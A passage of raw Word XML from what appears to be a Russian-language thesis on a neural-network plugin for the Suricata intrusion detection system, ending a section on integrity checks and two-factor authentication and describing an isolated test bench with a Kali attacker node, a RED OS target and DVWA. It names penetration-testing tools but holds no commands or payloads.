          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">путём изменения одного байта в файле модели — система немедленно зафиксировала расхождение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешей</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сформировала предупреждение. Двухфакторная аутентификация была успешно настроена и проверена — вход без корректного кода приложения был заблокирован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C0197" w14:textId="77777777" w:rsidR="0099286E" w:rsidRDefault="0099286E" w:rsidP="00402025">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EEF9002" w14:textId="5A1F94AE" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc231673292"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00402025">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> Тестирование эффективности плагина</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6C3CF" w14:textId="77777777" w:rsidR="002A245A" w:rsidRPr="005135C4" w:rsidRDefault="002A245A" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47749B6E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001B003D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для проведения практических испытаний и оценки эффективности разработанного нейросетевого модуля был сформирован испытательный стенд, имитирующий типовую инфраструктуру корпоративной сети. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="001B003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> качестве базовой операционной системы целевого узла выбрана ОС «РЕД ОС» версии 7.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BAACB" w14:textId="5907E3CB" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Архитектура стенда включает два основных узла, функционирующих в изолированной виртуальной сети</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265413CD" w14:textId="494E6323" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="003617AD" w:rsidP="003617AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>такующий узел (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux 2024.1). Представляет собой дистрибутив для проведения тестирования на проникновение, содержащий необходимые инструменты для реализации сценариев атак (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, hping3, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>адрес 192.168.0.101;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02886217" w14:textId="784BAADB" w:rsidR="008E0171" w:rsidRPr="00DD2F4C" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ц</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>елевой узел (РЕД ОС 7.3). Серверная платформа, на которой развёрнуты средства защиты и целевые сервисы. IP-адрес 192.168.0.104</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527ABD3" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001B003D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На целевом узле функционируют следующие компоненты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7A296" w14:textId="4EA3498F" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="003617AD" w:rsidP="003617AD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1701"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">СОВ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> версии 7.0.3. Настроена на захват </w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">трафика в </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режиме реального времени</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025124F" w14:textId="10705F1E" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="003617AD" w:rsidP="003617AD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нейросетевой плагин. Программный модуль на языке Python, интегрированный с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> через интерфейс EVE JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C607E57" w14:textId="13D83409" w:rsidR="003617AD" w:rsidRPr="00DD2F4C" w:rsidRDefault="003617AD" w:rsidP="003617AD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B" w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимое веб-приложение, развёрнутое в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-контейнере, служащее мишенью для атак прикладного уровня.</w:t>
      </w:r>
      <w:r w:rsidR="002A245A" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3278B117" w14:textId="5CF8CEBB" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="003617AD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Схема стенда представлена на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD43C2E" w14:textId="77777777" w:rsidR="00BA257D" w:rsidRPr="003617AD" w:rsidRDefault="00BA257D" w:rsidP="003617AD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2E86C3" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610E5B0F" wp14:editId="1FD7B43A">
            <wp:extent cx="5326380" cy="3151909"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1637220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20999" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId35">
                      <a:extLst>
                        <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                          <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId36"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="3735" t="5655" r="3635" b="5602"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5327926" cy="3152824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4C4A7" w14:textId="56126127" w:rsidR="008E0171" w:rsidRPr="00B07D26" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
